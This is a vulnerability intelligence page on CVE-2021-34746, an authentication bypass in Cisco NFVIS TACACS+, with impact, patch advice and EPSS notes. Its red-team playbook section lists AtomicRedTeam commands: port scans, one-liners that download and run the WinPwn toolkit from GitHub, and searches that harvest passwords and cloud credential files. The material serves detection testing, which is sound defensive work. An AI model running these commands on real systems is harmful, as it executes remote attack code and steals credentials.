CVE-2021-34746
Overview
This vulnerability is an authentication bypass in the TACACS+ AAA feature of Cisco Enterprise NFV Infrastructure Software. It stems from incomplete validation of user-supplied input passed to an authentication script, allowing injection of crafted parameters. The affected component is the TACACS+ authentication mechanism within NFVIS, which fails to properly sanitize authentication requests.
Vulnerability Description
A vulnerability in the TACACS+ authentication, authorization and accounting (AAA) feature of Cisco Enterprise NFV Infrastructure Software (NFVIS) could allow an unauthenticated, remote attacker to bypass authentication and log in to an affected device as an administrator. This vulnerability is due to incomplete validation of user-supplied input that is passed to an authentication script. An attacker could exploit this vulnerability by injecting parameters into an authentication request. A successful exploit could allow the attacker to bypass authentication and log in as an administrator to the affected device.
Impact
An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and gain administrator-level access to the affected device. This access enables full control over the NFVIS system, including configuration changes and potential lateral movement within the network. The attack requires no prior credentials (PR:N) and no user interaction (UI:N), with network-level access (AV:N) to the TACACS+ service, resulting in high confidentiality, integrity, and availability impact (C:H/I:H/A:H).
Solution
Cisco has released security updates addressing this vulnerability in Cisco Enterprise NFV Infrastructure Software as detailed in their advisory (cisco-sa-nfvis-g2DMVVh). Administrators should apply the provided patches immediately to affected NFVIS versions. No specific workarounds are noted; therefore, timely installation of the vendor-supplied updates is the recommended remediation step.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the TACACS+ authentication, authorization, and accounting (AAA) feature of Cisco's Enterprise NFV Infrastructure Software (NFVIS) stems from inadequate validation of user-supplied input. This flaw allows an unauthenticated remote attacker to inject malicious parameters into an authentication request, effectively bypassing the authentication mechanisms in place. The vulnerability arises from the way the authentication script processes input, failing to properly sanitize or validate the data before it is executed. As a result, an attacker can exploit this weakness to gain unauthorized access to the affected device, assuming the role of an administrator with full control over the system.
Exploitation of this vulnerability can occur through various attack vectors, primarily focusing on the network interface exposed to the TACACS+ service. An attacker could craft a specially formatted authentication request that the system would accept without proper verification. This could be executed from anywhere on the internet, making it particularly dangerous for devices that are not adequately segmented or protected by firewalls. Once the attacker successfully injects the parameters, they can log in as an administrator, allowing them to manipulate configurations, access sensitive data, or deploy additional malicious payloads within the network infrastructure.
The real-world impact of this vulnerability is significant, especially for organizations relying on Cisco's NFVIS for their network functions. The ability for an attacker to gain administrative access can lead to severe business risks, including data breaches, service disruptions, and potential compliance violations. Organizations may face financial losses due to operational downtime, remediation costs, and reputational damage. Furthermore, the exploitation of this vulnerability could serve as a foothold for further attacks, enabling lateral movement within the network and compromising additional systems or sensitive information.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected software versions is crucial to eliminate known vulnerabilities. Additionally, organizations should employ network segmentation to limit access to critical systems and enforce strict access controls. Monitoring and logging authentication attempts can help identify unusual patterns indicative of exploitation attempts. Intrusion detection systems (IDS) should be configured to alert on suspicious authentication requests, allowing for rapid response to potential threats. Finally, conducting regular security assessments and penetration testing can help identify weaknesses before they can be exploited by malicious actors.
In conclusion, the vulnerability in the TACACS+ feature of Cisco's NFVIS poses a serious threat to organizations that utilize this software for their network infrastructure. The potential for unauthorized administrative access can lead to significant operational and reputational damage. By understanding the technical details of the vulnerability, recognizing the various attack vectors, and implementing effective detection and mitigation strategies, organizations can better protect themselves against this and similar threats in the future.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2021-34746, rising by over 110% to a current level that places it near the 92nd percentile among tracked vulnerabilities. This upward adjustment reflects a growing likelihood of exploitation attempts in the near term, despite the absence of newly reported exploit techniques or active campaigns targeting this flaw. Our telemetry indicates that while exploitation activity remains stable, the elevated EPSS score suggests heightened attacker interest or improved exploit feasibility, which could presage an increase in malicious activity. For defenders, this shift underscores the need to maintain heightened vigilance around Cisco NFVIS deployments, as the risk of unauthorized administrative access through TACACS+ authentication bypass remains critically relevant. Consequently, the threat level associated with this vulnerability should be considered elevated, warranting continued monitoring and prioritization within vulnerability management programs.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Enterprise Nfv Infrastructure Software | All |
cpe:2.3:a:cisco:enterprise_nfv_infrastructure_software:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-34746 |
| tools.cisco.com |
GitHub CVE
vendor-advisory
x_refsource_CISCO
|
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nfvis-g2DMVVh |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/orangecertcc/security-research/security/advisories/GHSA-gqx8-c4xr-c664 |